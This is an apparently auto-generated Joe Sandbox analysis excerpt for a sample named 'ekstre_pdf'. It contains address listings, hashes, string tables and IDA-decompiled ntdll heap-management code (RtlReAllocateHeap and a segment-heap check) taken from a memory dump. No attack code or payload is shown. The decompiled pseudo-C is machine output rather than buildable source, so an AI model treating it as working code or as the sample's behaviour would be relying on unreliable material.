0x341097bd
0x341097c9
0x341097d6
0x341097de
0x341097e5
0x341097f0
0x00000000
0x341097f0
0x3410967f
0x34109683
0x34109687
0x34109693
0x34109697
0x341096b3
0x341096b8
0x341096bd
0x00000000
0x00000000
0x341096cb
0x341096d0
0x341096d4
0x341096e1
0x341096ed
0x341096f5
0x341096fc
0x34109704
0x3410970c
0x34109714
0x3410971a
0x3410971c
0x3410971e
0x00000000
0x00000000
0x34109724
0x00000000
0x34109724
0x34109689
0x3410968d
0x00000000
0x00000000
0x00000000
0x3410968d
0x34109624
0x34109629
0x3410962d
0x00000000
0x00000000
0x3410963b
0x34109644
0x34109647
0x3410964b
0x3410964f
0x34109657
0x3410965f
0x34109667
0x00000000
0x34109667
0x34109492
0x34109497
0x3410949a
0x341094a2
0x341094a4
0x341094ac
0x341094b3
0x341094b7
0x341094f4
0x341094f8
0x341094fb
0x341094ff
0x34109503
0x34109505
0x34109507
0x34109509
0x3410950f
0x3410950b
0x3410950b
0x3410950b
0x34109509
0x34109515
0x3410953d
0x3410953d
0x3410953f
0x00000000
0x00000000
0x34109522
0x34109524
0x3410952d
0x3410952f
0x3410952f
0x34109531
0x3410953b
0x3410953b
0x00000000
0x3410953b
0x34109533
0x34109535
0x00000000
0x00000000
0x34109537
0x00000000
0x34109537
0x34109526
0x00000000
0x00000000
0x34109528
0x00000000
0x34109528
0x34109550
0x34109557
0x34109557
0x34109559
0x34109561
0x3410956a
0x34109570
0x34109574
0x34109576
0x00000000
0x00000000
0x34109584
0x34109589
0x3410958c
0x34109596
0x34109597
0x3410959b
0x3410959f
0x341095c1
0x341095cd
0x341095d8
0x341095d8
0x341095a1
0x341095a1
0x341095a8
0x341095af
0x341095b6
0x341095b6
0x341095e7
0x341095ef
0x341095f8
0x34109601
0x34109607
0x34109609
0x3410960b
0x00000000
0x34109611
0x34109611
0x34109615
0x00000000
0x34109615
0x3410960b
0x341094bd
0x341094c0
0x341094c4
0x341094cd
0x341094cd
0x341094cd
0x341094cf
0x341094d4
0x341094e0
0x341094e7
0x341094eb
0x00000000
0x341094eb
0x3410930f
0x34109314
0x3410933c
0x3410933c
0x34109340
0x3410934a
0x3410934f
0x34109353
0x3410935c
0x34109368
0x34109370
0x34109377
0x3410937f
0x34109387
0x3410938d
0x3410938f
0x34109391
0x00000000
0x00000000
0x34109397
0x3410939b
0x341093ef
0x341093f5
0x34109400
0x34109400
0x34109406
0x34109408
0x3410940c
0x34109411
0x34109411
0x34109414
0x34109418
0x34109420
0x34109425
0x34109429
0x34109436
0x34109442
0x34109449
0x34109451
0x34109459
0x34109461
0x34109465
0x3410946b
0x3410946d
0x3410946f
0x00000000
0x00000000
0x34109475
0x00000000
0x34109475
0x3410939d
0x341093a5
0x341093d6
0x341093df
0x341093e3
0x00000000
0x341093e3
0x341093a7
0x341093c7
0x341093cc
0x00000000
0x341093cc
0x34109316
0x3410931c
0x00000000
0x00000000
0x3410931e
0x34109322
0x3410932c
0x34109332
0x34109338
0x34109334
0x34109334
0x34109334
0x00000000
0x34109332
0x34109891
0x34109891
0x00000000
0x34109891
0x34109296
0x341090c8
0x341090cd
0x341090d0
0x341090d8
0x341090e4
0x34109119
0x34109123
0x3410912b
0x34109136
0x34109140
0x34109150
0x34109159
0x34109166
0x34109173
0x3410917d
0x3410918a
0x34109194
0x34109198
0x3410919e
0x341091a5
0x341091ac
0x341091b2
0x341091b4
0x341091b6
0x341091b9
0x341091c0
0x341091c2
0x341091c4
0x341091c9
0x341091c9
0x341091cb
0x341091cb
0x341091c4
0x341091d2
0x341091d8
0x341091de
0x341091e5
0x341091e7
0x341091e9
0x341091eb
0x341091ee
0x341091f0
0x341091f0
0x341091f6
0x341091f6
0x341090e6
0x341090ea
0x341090ee
0x341090ee
0x34109208
0x3410920e
0x00000000
0x3410920e

APIs

RtlDebugPrintTimes.NTDLL ref: 34109208
RtlDebugPrintTimes.NTDLL ref: 341092A7
RtlDebugPrintTimes.NTDLL ref: 34109387
RtlDebugPrintTimes.NTDLL ref: 34109465
RtlDebugPrintTimes.NTDLL ref: 3410956A
RtlDebugPrintTimes.NTDLL ref: 34109601
RtlDebugPrintTimes.NTDLL ref: 34109714
RtlDebugPrintTimes.NTDLL ref: 3410987C

Strings

, xrefs: 34109657
, xrefs: 34109704
0, xrefs: 34109776

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $ $0
API String ID: 3446177414-3352262554
Opcode ID: e11db6996ed2b7da5e5a63de887ba0bbdcb1c1601f76345cde5b3beb856fd804
Instruction ID: 919b3e47ee757b72bf915c3de36446ea2d60969ed863b6364afb5dbd94228d1a
Opcode Fuzzy Hash: e11db6996ed2b7da5e5a63de887ba0bbdcb1c1601f76345cde5b3beb856fd804
Instruction Fuzzy Hash: 4D3222B1A187818FE350CF68C994B9BBBE5BB88344F04896EF59987350D774E908CF52

Uniqueness

Uniqueness Score: -1.00%

Function 34098540 Relevance: 17.7, Strings: 14, Instructions: 223COMMON

Download Yara Rule

Strings

Address of the debug info found in the active list., xrefs: 340D52B9, 340D5305
8, xrefs: 340D50EE
Critical section address, xrefs: 340D5230, 340D52C7, 340D533F
Invalid debug info address of this critical section, xrefs: 340D52C1
corrupted critical section, xrefs: 340D52CD
Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 340D52D9
Critical section address., xrefs: 340D530D
Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 340D5215, 340D52A1, 340D5324
double initialized or corrupted critical section, xrefs: 340D5313
undeleted critical section in freed memory, xrefs: 340D5236
First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 340D52ED
Thread is in a state in which it cannot own a critical section, xrefs: 340D534E
Critical section debug info address, xrefs: 340D522A, 340D5339
Thread identifier, xrefs: 340D5345

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID:
String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
API String ID: 0-2368682639
Opcode ID: bfbc04cab652d496e1bf1e60ef63bb89d869f6bbe8dc22997c0a9eb077a798b0
Instruction ID: 5dc01aae2f93d04bc0198e630201f37f495ccc2af0765b3d586912c705d6f8dd
Opcode Fuzzy Hash: bfbc04cab652d496e1bf1e60ef63bb89d869f6bbe8dc22997c0a9eb077a798b0
Instruction Fuzzy Hash: 008166B6B00708AFEB50CF94C980BAEBBF9FB49714F2045E9E905A7250D775A948CF50

Uniqueness

Uniqueness Score: -1.00%

Function 3410FDF4 Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 348
timeCOMMONCrypto

Download Yara Rule

C-Code - Quality: 64%

			E3410FDF4(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t130;
				signed int _t132;
				intOrPtr _t138;
				intOrPtr _t139;
				signed int _t149;
				signed int _t150;
				intOrPtr _t151;
				signed int _t152;
				intOrPtr _t155;
				intOrPtr _t159;
				intOrPtr _t172;
				signed int _t173;
				signed int _t174;
				signed char _t177;
				signed int _t178;
				signed int _t183;
				void* _t184;
				signed char _t192;
				signed int _t193;
				intOrPtr _t195;
				intOrPtr _t199;
				signed int _t209;
				signed int _t226;
				signed char _t236;
				intOrPtr _t240;
				signed int* _t248;
				signed int _t253;
				signed int _t255;
				signed int _t267;
				signed int _t278;
				signed int* _t279;
				intOrPtr* _t283;
				void* _t284;
				void* _t286;

				_push(0x40);
				_push(0x3413d430);
				E340B7BE4(__ebx, __edi, __esi);
				_t281 = __ecx;
				 *((intOrPtr*)(_t284 - 0x3c)) = __ecx;
				 *((char*)(_t284 - 0x19)) = 0;
				 *(_t284 - 0x24) = 0;
				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
					 *((intOrPtr*)(_t284 - 4)) = 0;
					 *((intOrPtr*)(_t284 - 4)) = 1;
					_t130 = E34057662("RtlReAllocateHeap");
					__eflags = _t130;
					if(_t130 == 0) {
						L72:
						 *(_t284 - 0x24) = 0;
						L73:
						 *((intOrPtr*)(_t284 - 4)) = 0;
						 *((intOrPtr*)(_t284 - 4)) = 0xfffffffe;
						E341102E6(_t281);
						_t132 =  *(_t284 - 0x24);
						goto L75;
					}
					_t236 =  *(__ecx + 0x44) | __edx;
					 *(_t284 - 0x30) = _t236;
					 *(_t284 - 0x34) = _t236 | 0x10000100;
					__eflags =  *(_t284 + 0xc);
					if( *(_t284 + 0xc) == 0) {
						_t267 = 1;
						__eflags = 1;
					} else {
						_t267 =  *(_t284 + 0xc);
					}
					_t138 = ( *((intOrPtr*)(_t281 + 0x94)) + _t267 &  *(_t281 + 0x98)) + 8;
					 *((intOrPtr*)(_t284 - 0x40)) = _t138;
					__eflags = _t138 -  *(_t284 + 0xc);
					if(_t138 <  *(_t284 + 0xc)) {
						L68:
						_t139 =  *[fs:0x30];
						__eflags =  *(_t139 + 0xc);
						if( *(_t139 + 0xc) == 0) {
							_push("HEAP: ");
							E3405B910();
						} else {
							E3405B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push( *((intOrPtr*)(_t281 + 0x78)));
						E3405B910("Invalid allocation size - %Ix (exceeded %Ix)\n",  *(_t284 + 0xc));
						goto L72;
					}
					__eflags = _t138 -  *((intOrPtr*)(_t281 + 0x78));
					if(_t138 >  *((intOrPtr*)(_t281 + 0x78))) {
						goto L68;
					}
					 *(_t284 - 0x20) = 0;
					__eflags = _t236 & 0x00000001;
					if((_t236 & 0x00000001) == 0) {
						E3406FED0( *((intOrPtr*)(_t281 + 0xc8)));
						 *((char*)(_t284 - 0x19)) = 1;
						_t226 =  *(_t284 - 0x30) | 0x10000101;
						__eflags = _t226;
						 *(_t284 - 0x34) = _t226;
					}
					E34110835(_t281, 0);
					_t277 =  *((intOrPtr*)(_t284 + 8));
					_t269 = _t277 - 8;
					__eflags =  *((char*)(_t269 + 7)) - 5;
					if( *((char*)(_t269 + 7)) == 5) {
						_t269 = _t269 - (( *(_t269 + 6) & 0x000000ff) << 3);
						__eflags = _t269;
					}
					 *(_t284 - 0x2c) = _t269;
					 *(_t284 - 0x28) = _t269;
					_t240 = _t281;
					_t149 = E3405753F(_t240, _t269, "RtlReAllocateHeap");
					__eflags = _t149;
					if(_t149 == 0) {
						L53:
						_t150 =  *(_t284 - 0x24);
						__eflags = _t150;
						if(_t150 == 0) {
							goto L73;
						}
						__eflags = _t150 -  *0x341547c8; // 0x0
						_t151 =  *[fs:0x30];
						if(__eflags != 0) {
							_t152 =  *(_t151 + 0x68);
							 *(_t284 - 0x48) = _t152;
							__eflags = _t152 & 0x00000800;
							if((_t152 & 0x00000800) == 0) {
								goto L73;
							}
							__eflags =  *(_t284 - 0x20) -  *0x341547cc; // 0x0
							if(__eflags != 0) {
								goto L73;
							}
							__eflags =  *((intOrPtr*)(_t281 + 0x7c)) -  *0x341547ce; // 0x0
							if(__eflags != 0) {
								goto L73;
							}
							_t155 =  *[fs:0x30];
							__eflags =  *(_t155 + 0xc);
							if( *(_t155 + 0xc) == 0) {
								_push("HEAP: ");
								E3405B910();
							} else {
								E3405B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(E3410823A(_t281,  *(_t284 - 0x20)));
							_push( *(_t284 + 0xc));
							E3405B910("Just reallocated block at %p to 0x%Ix bytes with tag %ws\n",  *(_t284 - 0x24));
							L59:
							_t159 =  *[fs:0x30];
							__eflags =  *((char*)(_t159 + 2));
							if( *((char*)(_t159 + 2)) != 0) {
								 *0x341547a1 = 1;
								 *0x34154100 = 0;
								asm("int3");
								 *0x341547a1 = 0;
							}
							goto L73;
						}
						__eflags =  *(_t151 + 0xc);
						if( *(_t151 + 0xc) == 0) {
							_push("HEAP: ");
							E3405B910();
						} else {
							E3405B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push( *(_t284 + 0xc));
						E3405B910("Just reallocated block at %p to %Ix bytes\n",  *0x341547c8);
						goto L59;
					} else {
						__eflags = _t277 -  *0x341547c8; // 0x0
						_t172 =  *[fs:0x30];
						if(__eflags != 0) {
							_t173 =  *(_t172 + 0x68);
							 *(_t284 - 0x44) = _t173;
							__eflags = _t173 & 0x00000800;
							if((_t173 & 0x00000800) == 0) {
								L38:
								_t174 = E34072710(_t281,  *(_t284 - 0x34), _t277,  *(_t284 + 0xc));
								 *(_t284 - 0x24) = _t174;
								__eflags = _t174;
								if(_t174 != 0) {
									_t75 = _t174 - 8; // -8
									_t278 = _t75;
									__eflags =  *((char*)(_t278 + 7)) - 5;
									if( *((char*)(_t278 + 7)) == 5) {
										_t278 = _t278 - (( *(_t278 + 6) & 0x000000ff) << 3);
										__eflags = _t278;
									}
									_t248 = _t278;
									 *(_t284 - 0x28) = _t278;
									__eflags =  *(_t281 + 0x4c);
									if( *(_t281 + 0x4c) != 0) {
										 *_t278 =  *_t278 ^  *(_t281 + 0x50);
										__eflags =  *(_t278 + 3) - (_t248[0] ^ _t248[0] ^  *_t248);
										if(__eflags != 0) {
											_push(_t248);
											_t269 = _t278;
											E3411D646(0, _t281, _t278, _t278, _t281, __eflags);
										}
									}
									__eflags =  *(_t278 + 2) & 0x00000002;
									if(( *(_t278 + 2) & 0x00000002) == 0) {
										_t177 =  *(_t278 + 3);
										 *(_t284 - 0x1b) = _t177;
										_t178 = _t177 & 0x000000ff;
									} else {
										_t183 = E34093AE9(_t278);
										 *(_t284 - 0x30) = _t183;
										__eflags =  *(_t281 + 0x40) & 0x08000000;
										if(( *(_t281 + 0x40) & 0x08000000) == 0) {
											 *_t183 = 0;
										} else {
											_t184 = E3408FDB9(1, _t269);
											_t253 =  *(_t284 - 0x30);
											 *_t253 = _t184;
											_t183 = _t253;
										}
										_t178 =  *((intOrPtr*)(_t183 + 2));
									}
									 *(_t284 - 0x20) = _t178;
									__eflags =  *(_t281 + 0x4c);
									if( *(_t281 + 0x4c) != 0) {
										 *(_t278 + 3) =  *(_t278 + 2) ^  *(_t278 + 1) ^  *_t278;
										 *_t278 =  *_t278 ^  *(_t281 + 0x50);
										__eflags =  *_t278;
									}
								}
								E34110D24(_t281);
								__eflags = 0;
								E34110835(_t281, 0);
								goto L53;
							}
							__eflags =  *0x341547cc;
							if( *0x341547cc == 0) {
								goto L38;
							}
							_t279 =  *(_t284 - 0x28);
							_t269 =  *(_t284 - 0x2c);
							__eflags =  *(_t281 + 0x4c);
							if( *(_t281 + 0x4c) != 0) {
								 *_t279 =  *_t279 ^  *(_t281 + 0x50);
								__eflags = _t279[0] - ( *(_t269 + 2) ^  *(_t269 + 1) ^  *_t269);
								if(__eflags != 0) {
									_push(_t240);
									E3411D646(0, _t281, _t279, _t279, _t281, __eflags);
									_t269 =  *(_t284 - 0x2c);
								}
							}
							__eflags = _t279[0] & 0x00000002;
							if((_t279[0] & 0x00000002) == 0) {
								_t192 = _t279[0];
								 *(_t284 - 0x1a) = _t192;
								_t193 = _t192 & 0x000000ff;
							} else {
								_t209 = E34093AE9(_t279);
								 *(_t284 - 0x30) = _t209;
								_t193 =  *(_t209 + 2) & 0x0000ffff;
							}
							_t255 = _t193;
							 *(_t284 - 0x20) = _t193;
							__eflags =  *(_t281 + 0x4c);
							if( *(_t281 + 0x4c) != 0) {
								_t279[0] =  *(_t269 + 2) ^  *(_t269 + 1) ^  *_t269;
								 *_t279 =  *_t279 ^  *(_t281 + 0x50);
								__eflags =  *_t279;
							}
							__eflags = _t255;
							if(_t255 == 0) {
								L37:
								_t277 =  *((intOrPtr*)(_t284 + 8));
							} else {
								__eflags = _t255 -  *0x341547cc; // 0x0
								if(__eflags != 0) {
									goto L37;
								}
								__eflags =  *((intOrPtr*)(_t281 + 0x7c)) -  *0x341547ce; // 0x0
								if(__eflags != 0) {
									goto L37;
								}
								_t195 =  *[fs:0x30];
								__eflags =  *(_t195 + 0xc);
								if( *(_t195 + 0xc) == 0) {
									_push("HEAP: ");
									E3405B910();
								} else {
									E3405B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_t269 =  *(_t284 - 0x20);
								_push(E3410823A(_t281,  *(_t284 - 0x20)));
								_push( *(_t284 + 0xc));
								_t277 =  *((intOrPtr*)(_t284 + 8));
								E3405B910("About to rellocate block at %p to 0x%Ix bytes with tag %ws\n",  *((intOrPtr*)(_t284 + 8)));
								_t286 = _t286 + 0x10;
								L18:
								_t199 =  *[fs:0x30];
								__eflags =  *((char*)(_t199 + 2));
								if( *((char*)(_t199 + 2)) != 0) {
									 *0x341547a1 = 1;
									 *0x34154100 = 0;
									asm("int3");
									 *0x341547a1 = 0;
								}
							}
							goto L38;
						}
						__eflags =  *(_t172 + 0xc);
						if( *(_t172 + 0xc) == 0) {
							_push("HEAP: ");
							E3405B910();
						} else {
							E3405B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push( *(_t284 + 0xc));
						E3405B910("About to reallocate block at %p to %Ix bytes\n",  *0x341547c8);
						_t286 = _t286 + 0xc;
						goto L18;
					}
				} else {
					_t283 =  *0x3415374c; // 0x0
					 *0x341591e0(__ecx, __edx,  *((intOrPtr*)(_t284 + 8)),  *(_t284 + 0xc));
					_t132 =  *_t283();
					L75:
					 *[fs:0x0] =  *((intOrPtr*)(_t284 - 0x10));
					return _t132;
				}
			}

0x3410fdf4
0x3410fdf6
0x3410fdfb
0x3410fe02
0x3410fe04
0x3410fe09
0x3410fe0c
0x3410fe16
0x3410fe35
0x3410fe38
0x3410fe46
0x3410fe4b
0x3410fe4d
0x34110277
0x34110277
0x3411027a
0x3411027a
0x341102c2
0x341102c9
0x341102ce
0x00000000
0x341102ce
0x3410fe56
0x3410fe58
0x3410fe62
0x3410fe65
0x3410fe69
0x3410fe72
0x3410fe72
0x3410fe6b
0x3410fe6b
0x3410fe6b
0x3410fe81
0x3410fe84
0x3410fe87
0x3410fe8a
0x34110231
0x34110231
0x34110237
0x3411023a
0x34110259
0x3411025e
0x3411023c
0x34110251
0x34110256
0x34110264
0x3411026f
0x00000000
0x34110274
0x3410fe90
0x3410fe93
0x00000000
0x00000000
0x3410fe9b
0x3410fe9f
0x3410fea2
0x3410feaa
0x3410feaf
0x3410feb6
0x3410feb6
0x3410febb
0x3410febb
0x3410fec2
0x3410fec7
0x3410feca
0x3410fecd
0x3410fed1
0x3410feda
0x3410feda
0x3410feda
0x3410fedc
0x3410fedf
0x3410fee7
0x3410fee9
0x3410feee
0x3410fef0
0x34110122
0x34110122
0x34110125
0x34110127
0x00000000
0x00000000
0x3411012d
0x34110133
0x34110139
0x341101a7
0x341101aa
0x341101ad
0x341101b2
0x00000000
0x00000000
0x341101bc
0x341101c3
0x00000000
0x00000000
0x341101cd
0x341101d4
0x00000000
0x00000000
0x341101da
0x341101e0
0x341101e3
0x34110202
0x34110207
0x341101e5
0x341101fa
0x341101ff
0x34110218
0x34110219
0x34110224
0x3411017e
0x3411017e
0x34110184
0x34110188
0x3411018e
0x34110195
0x3411019b
0x3411019c
0x3411019c
0x00000000
0x34110188
0x3411013b
0x3411013e
0x3411015d
0x34110162
0x34110140
0x34110155
0x3411015a
0x34110168
0x34110176
0x00000000
0x3410fef6
0x3410fef6
0x3410fefc
0x3410ff02
0x3410ff70
0x3410ff73
0x3410ff76
0x3410ff7b
0x34110068
0x34110070
0x34110075
0x34110078
0x3411007a
0x34110080
0x34110080
0x34110083
0x34110087
0x34110090
0x34110090
0x34110090
0x34110092
0x34110094
0x34110097
0x3411009a
0x3411009f
0x341100a9
0x341100ac
0x341100ae
0x341100af
0x341100b3
0x341100b3
0x341100ac
0x341100b8
0x341100bc
0x341100ec
0x341100ef
0x341100f2
0x341100be
0x341100c0
0x341100c5
0x341100ca
0x341100d1
0x341100e3
0x341100d3
0x341100d4
0x341100d9
0x341100dc
0x341100df
0x341100df
0x341100e6
0x341100e6
0x341100f5
0x341100f9
0x341100fc
0x34110108
0x3411010e
0x3411010e
0x3411010e
0x341100fc
0x34110114
0x34110119
0x3411011d
0x00000000
0x3411011d
0x3410ff81
0x3410ff88
0x00000000
0x00000000
0x3410ff8e
0x3410ff91
0x3410ff94
0x3410ff97
0x3410ff9c
0x3410ffa6
0x3410ffa9
0x3410ffab
0x3410ffb0
0x3410ffb5
0x3410ffb5
0x3410ffa9
0x3410ffb8
0x3410ffbc
0x3410ffce
0x3410ffd1
0x3410ffd4
0x3410ffbe
0x3410ffc0
0x3410ffc5
0x3410ffc8
0x3410ffc8
0x3410ffd7
0x3410ffd9
0x3410ffdd
0x3410ffe0
0x3410ffea
0x3410fff0
0x3410fff0
0x3410fff0
0x3410fff2
0x3410fff5
0x34110065
0x34110065
0x3410fff7
0x3410fff7
0x3410fffe
0x00000000
0x00000000
0x34110004
0x3411000b
0x00000000
0x00000000
0x3411000d
0x34110013
0x34110016
0x34110035
0x3411003a
0x34110018
0x3411002d
0x34110032
0x34110040
0x3411004b
0x3411004c
0x3411004f
0x34110058
0x3411005d
0x3410ff47
0x3410ff47
0x3410ff4d
0x3410ff51
0x3410ff57
0x3410ff5e
0x3410ff64
0x3410ff65
0x3410ff65
0x3410ff51
0x00000000
0x3410fff5
0x3410ff04
0x3410ff07
0x3410ff26
0x3410ff2b
0x3410ff09
0x3410ff1e
0x3410ff23
0x3410ff31
0x3410ff3f
0x3410ff44
0x00000000
0x3410ff44
0x3410fe18
0x3410fe20
0x3410fe28
0x3410fe2e
0x341102d1
0x341102d4
0x341102e0
0x341102e0

APIs

RtlDebugPrintTimes.NTDLL ref: 3410FE28

Strings

Just reallocated block at %p to %Ix bytes, xrefs: 34110171
HEAP[%wZ]: , xrefs: 3410FF19, 34110028, 34110150, 341101F5, 3411024C
Just reallocated block at %p to 0x%Ix bytes with tag %ws, xrefs: 3411021F
HEAP: , xrefs: 3410FF26, 34110035, 3411015D, 34110202, 34110259
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 3411026A
About to reallocate block at %p to %Ix bytes, xrefs: 3410FF3A
RtlReAllocateHeap, xrefs: 3410FE3F, 3410FEE2
About to rellocate block at %p to 0x%Ix bytes with tag %ws, xrefs: 34110053

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID: DebugPrintTimes
String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
API String ID: 3446177414-1700792311
Opcode ID: 4b740784a11f957eeb92497413d4e9ced9dd3a1b577b0f500064aceb3d24ce37
Instruction ID: 9a980b312a984e63680f76d4912440915b9c712c075f8c50a8f9e8aede95bb32
Opcode Fuzzy Hash: 4b740784a11f957eeb92497413d4e9ced9dd3a1b577b0f500064aceb3d24ce37
Instruction Fuzzy Hash: A4D1D035A04A45DFDB02CFAAC480BA9BFF6FF4A354F4480E9E445AB662C735A941CF14

Uniqueness

Uniqueness Score: -1.00%

Function 341086C2 Relevance: 12.6, Strings: 10, Instructions: 146
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E341086C2(void* __ebx, signed short* __ecx, signed short __edx) {
				signed int _v8;
				char _v268;
				char _v300;
				char* _v304;
				char* _v308;
				char* _v312;
				char* _v316;
				char* _v320;
				char* _v324;
				char _v1076;
				signed int _v1084;
				signed int _v1092;
				signed short _v1096;
				void* __edi;
				void* __esi;
				signed int _t54;
				short* _t59;
				void* _t65;
				signed int _t66;
				void* _t67;
				intOrPtr _t69;
				void* _t74;
				void* _t75;
				void* _t80;
				void* _t81;
				signed short _t82;
				signed short* _t84;
				void* _t85;
				intOrPtr* _t86;
				signed int _t90;
				void* _t92;
				signed int _t93;
				signed int _t95;

				_t82 = __edx;
				_t75 = __ebx;
				_t95 = (_t93 & 0xfffffff8) - 0x448;
				_v8 =  *0x3415b370 ^ _t95;
				_t84 = __ecx;
				_v324 = L"svchost.exe";
				_v320 = L"runtimebroker.exe";
				_t90 = 0;
				_v316 = L"csrss.exe";
				_v312 = L"smss.exe";
				_v308 = L"services.exe";
				_v304 = L"lsass.exe";
				_v1084 =  *[fs:0x30];
				if((E34060670() & 0x00010000) != 0) {
					L26:
					 *0x341538c0 = _t90;
					_t90 = 1;
				} else {
					if(E340642B0(0, 0, L"http://schemas.microsoft.com/SMI/2020/WindowsSettings", L"heapType",  &_v300, 0xf, 0) < 0) {
						L3:
						_t54 = _v1084;
						if(( *(_t54 + 3) & 0x00000010) == 0) {
							if( *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x10)) + 0x2b0)) != _t90) {
								goto L26;
							} else {
								if(_t84 != 0) {
									_t79 = _t90;
									_t82 = _t84[2];
									_t59 = _t82 + ((( *_t84 & 0x0000ffff) >> 1) - 1) * 2;
									while(1) {
										_v1092 = _t79;
										if(_t59 <= _t82) {
											break;
										}
										if( *_t59 == 0x5c) {
											if(_t79 == 0) {
												L24:
												_v1096 = 0x100;
												if(E34094E50(0xfffffffc,  &_v268,  &_v1096, _t90, _t90, _t90,  &_v1084) >= 0) {
													_t65 = E340A7AD0( &_v268, L"DefaultBrowser_NOPUBLISHERID", 0x1d);
													_t95 = _t95 + 0xc;
													if(_t65 == 0) {
														goto L26;
													}
												}
											} else {
												_t28 = _t59 + 2; // 0x2
												_t82 = _t28;
												_v1096 = _t82;
												if(_t82 != 0) {
													_t66 = _t90;
													_v1084 = _t90;
													do {
														_t86 =  *((intOrPtr*)(_t95 + 0x310 + _t66 * 4));
														_t67 = E340A7AD0(_t82, _t86, _t79);
														_t95 = _t95 + 0xc;
														if(_t67 != 0) {
															_t79 = _v1092;
															goto L23;
														} else {
															_t34 = _t86 + 2; // 0x3403708e
															_t80 = _t34;
															do {
																_t69 =  *_t86;
																_t86 = _t86 + 2;
															} while (_t69 != _t90);
															_t79 = _v1092;
															if(_v1092 == _t86 - _t80 >> 1) {
																goto L26;
															} else {
																goto L23;
															}
														}
														goto L27;
														L23:
														_t82 = _v1096;
														_t66 = _v1084 + 1;
														_v1084 = _t66;
													} while (_t66 < 6);
												}
												goto L24;
											}
										} else {
											_t79 = _t79 + 1;
											_t59 = _t59 - 2;
											continue;
										}
										goto L27;
									}
									goto L24;
								}
							}
						} else {
							_push(_t90);
							_push( &_v1092);
							_push( &_v1076);
							_t81 = 0xfffffffc;
							if(E34094F11(_t81) < 0 || (_v1092 & 0x00008000) == 0) {
								goto L26;
							} else {
							}
						}
					} else {
						_t74 = E340A7AD0( &_v300, L"SegmentHeap", 0xf);
						_t95 = _t95 + 0xc;
						if(_t74 == 0) {
							goto L26;
						} else {
							goto L3;
						}
					}
				}
				L27:
				_pop(_t85);
				_pop(_t92);
				return E340A4B50(_t90, _t75, _v8 ^ _t95, _t82, _t85, _t92);
			}

0x341086c2
0x341086c2
0x341086ca
0x341086d7
0x341086e6
0x341086e8
0x341086f3
0x341086fe
0x34108700
0x3410870b
0x34108716
0x34108721
0x3410872c
0x3410873a
0x34108892
0x34108892
0x3410889a
0x34108740
0x3410875e
0x3410877f
0x3410877f
0x34108787
0x341087c0
0x00000000
0x341087c6
0x341087c8
0x341087d1
0x341087d3
0x341087d9
0x341087e8
0x341087e8
0x341087ee
0x00000000
0x00000000
0x341087e2
0x341087f4
0x3410884f
0x34108853
0x34108875
0x34108886
0x3410888b
0x34108890
0x00000000
0x00000000
0x34108890
0x341087f6
0x341087f6
0x341087f6
0x341087f9
0x341087ff
0x34108801
0x34108803
0x34108807
0x34108807
0x34108811
0x34108816
0x3410881b
0x34108839
0x00000000
0x3410881d
0x3410881d
0x3410881d
0x34108820
0x34108820
0x34108823
0x34108826
0x3410882d
0x34108835
0x00000000
0x34108837
0x00000000
0x34108837
0x34108835
0x00000000
0x3410883d
0x34108841
0x34108845
0x34108846
0x3410884a
0x34108807
0x00000000
0x341087ff
0x341087e4
0x341087e4
0x341087e5
0x00000000
0x341087e5
0x00000000
0x341087e2
0x00000000
0x341087f0
0x341087c8
0x34108789
0x34108789
0x3410878e
